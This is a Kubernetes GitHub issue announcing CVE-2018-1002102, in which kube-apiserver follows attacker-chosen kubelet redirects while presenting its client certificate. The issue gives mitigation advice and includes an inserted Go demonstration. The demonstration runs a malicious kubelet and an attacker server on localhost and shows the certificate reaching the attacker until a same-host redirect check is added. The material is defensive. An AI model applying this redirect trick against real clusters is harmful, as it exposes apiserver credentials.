CVE-2018-1002102: Unvalidated redirect #85867

Closed. tallclair opened this issue Dec 3, 2019 · 3 comments
Labels
area/apiserver area/security committee/security-response Denotes an issue or PR intended to be handled by the product security committee. kind/bug Categorizes issue or PR as related to a bug. official-cve-feed Issues or PRs related to CVEs officially announced by Security Response Committee (SRC) sig/api-machinery Categorizes an issue or PR as relevant to SIG API Machinery. sig/node Categorizes an issue or PR as relevant to SIG Node.

Comments

@tallclair
Member

CVSS Rating: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)

An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube-apiservers will follow the redirect as a GET request with client-cert credentials for authenticating to the Kubelet.

Am I vulnerable?

Kubernetes API servers with the StreamingProxyRedirects feature enabled AND without the ValidateProxyRedirects feature are affected.

API servers using SSH tunnels (--ssh-user / --ssh-keyfile) are not affected.

Using the default feature gate values, kube-apiserver versions before v1.14 are affected.

How do I mitigate this vulnerability?

For Kubernetes versions >= v1.10.0, the ValidateProxyRedirects feature can be manually enabled with the kube-apiserver flag --feature-gates=ValidateProxyRedirects=true.

Fix impact

The ValidateProxyRedirects feature will cause the kube-apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built-in dockershim & setting the kubelet flag --redirect-container-streaming=true), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting --redirect-container-streaming=false on the kubelet to avoid issues.

Fixed Versions

Additional Details

In a future release, we plan to deprecate the StreamingProxyRedirects feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests).

Acknowledgements

This vulnerability was reported by Alban Crequy.

/area security
/kind bug
/committee product-security
/sig api-machinery node
/area apiserver

/close
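The scenario in the advisory above, as an added example (not code from the Kubernetes project or from this issue): a local TLS "kubelet" answers an exec request with a redirect to a second, attacker-controlled TLS server, and an apiserver-side http.Client carrying a client certificate is run once with Go's default redirect handling and once with a CheckRedirect hook that models the same-host policy described under "Fix impact". The server addresses, the /exec path, and the certificate CN are constructed for this example; sameHostRedirect is a model of ValidateProxyRedirects, not the apiserver's own implementation.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net/http"
	"net/http/httptest"
	"time"
)

// newClientCert makes a throwaway self-signed certificate that stands in for
// the apiserver's kubelet client certificate (constructed for this example).
func newClientCert(cn string) tls.Certificate {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: cn},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(time.Hour)}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key}
}

// tlsServer starts a local TLS server that requires a client certificate,
// as a kubelet does for apiserver traffic.
func tlsServer(h http.HandlerFunc) *httptest.Server {
	s := httptest.NewUnstartedServer(h)
	s.TLS = &tls.Config{ClientAuth: tls.RequireAnyClientCert}
	s.StartTLS()
	return s
}

// sameHostRedirect is an http.Client CheckRedirect hook with the policy the
// advisory describes for ValidateProxyRedirects: a redirect may only point at
// the host the original request went to. A production check compares the host
// name only (a kubelet may legitimately redirect to a CRI streaming server on
// another port of the same node); both test servers here share 127.0.0.1, so
// this example compares host:port to keep the two cases distinguishable.
func sameHostRedirect(req *http.Request, via []*http.Request) error {
	if req.URL.Host != via[0].URL.Host {
		return fmt.Errorf("refusing redirect from %s to %s", via[0].URL.Host, req.URL.Host)
	}
	return nil
}

// Result is what the attacker-controlled endpoint observed for one request.
type Result struct {
	AttackerHit bool   // the attacker server received a request at all
	Method      string // method the redirected request arrived with
	ClientCN    string // CN of the client certificate presented to the attacker
	ClientErr   error  // error returned to the apiserver-side client, if any
}

// run sends one apiserver-style exec request to a malicious "kubelet" that
// redirects off-host, using the given redirect policy (nil = Go's default).
func run(check func(*http.Request, []*http.Request) error) Result {
	var res Result
	attacker := tlsServer(func(w http.ResponseWriter, r *http.Request) {
		res.AttackerHit, res.Method = true, r.Method
		if len(r.TLS.PeerCertificates) > 0 {
			res.ClientCN = r.TLS.PeerCertificates[0].Subject.CommonName
		}
	})
	defer attacker.Close()
	kubelet := tlsServer(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, attacker.URL+"/exec", http.StatusFound) // attacker-chosen Location
	})
	defer kubelet.Close()

	// Apiserver-side client: trusts both servers and presents its client cert
	// on every TLS connection, including ones opened to follow a redirect.
	roots := x509.NewCertPool()
	roots.AddCert(kubelet.Certificate())
	roots.AddCert(attacker.Certificate())
	client := &http.Client{
		Transport: &http.Transport{TLSClientConfig: &tls.Config{
			RootCAs: roots, Certificates: []tls.Certificate{newClientCert("kube-apiserver-kubelet-client")}}},
		CheckRedirect: check,
	}
	resp, err := client.Post(kubelet.URL+"/exec/default/pod/ctr", "application/json", nil)
	if err == nil {
		resp.Body.Close()
	}
	res.ClientErr = err
	return res
}

func main() {
	for _, check := range []func(*http.Request, []*http.Request) error{nil, sameHostRedirect} {
		res := run(check)
		fmt.Printf("validate=%-5v attacker hit=%-5v method=%-5q client CN=%q err=%v\n",
			check != nil, res.AttackerHit, res.Method, res.ClientCN, res.ClientErr)
	}
}
```

With the default policy the attacker server sees a GET authenticated with the apiserver's client certificate, which is the leak the CVSS vector's C:L describes; with the same-host hook the client returns an error before any connection to the attacker is opened. Note that Go's http.Client only strips headers such as Authorization on cross-host redirects; a TLS client certificate is transport-level and is presented to whatever host the redirect names, which is why the check has to happen in CheckRedirect (or, in the apiserver, in its proxy redirect handling) rather than rely on header hygiene.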

@k8s-ci-robot
Contributor

@tallclair: Closing this issue.


@k8s-ci-robot k8s-ci-robot added kind/bug Categorizes issue or PR as related to a bug. committee/security-response Denotes an issue or PR intended to be handled by the product security committee. sig/api-machinery Categorizes an issue or PR as relevant to SIG API Machinery. sig/node Categorizes an issue or PR as relevant to SIG Node. area/apiserver labels Dec 3, 2019
@PushkarJ
Member

PushkarJ commented Dec 2, 2021

/label official-cve-feed

(testing the new label from kubernetes/test-infra#23428)

@k8s-ci-robot k8s-ci-robot added the official-cve-feed Issues or PRs related to CVEs officially announced by Security Response Committee (SRC) label Dec 2, 2021
@PushkarJ
Member

PushkarJ commented Dec 2, 2021

Related kubernetes/sig-security#1
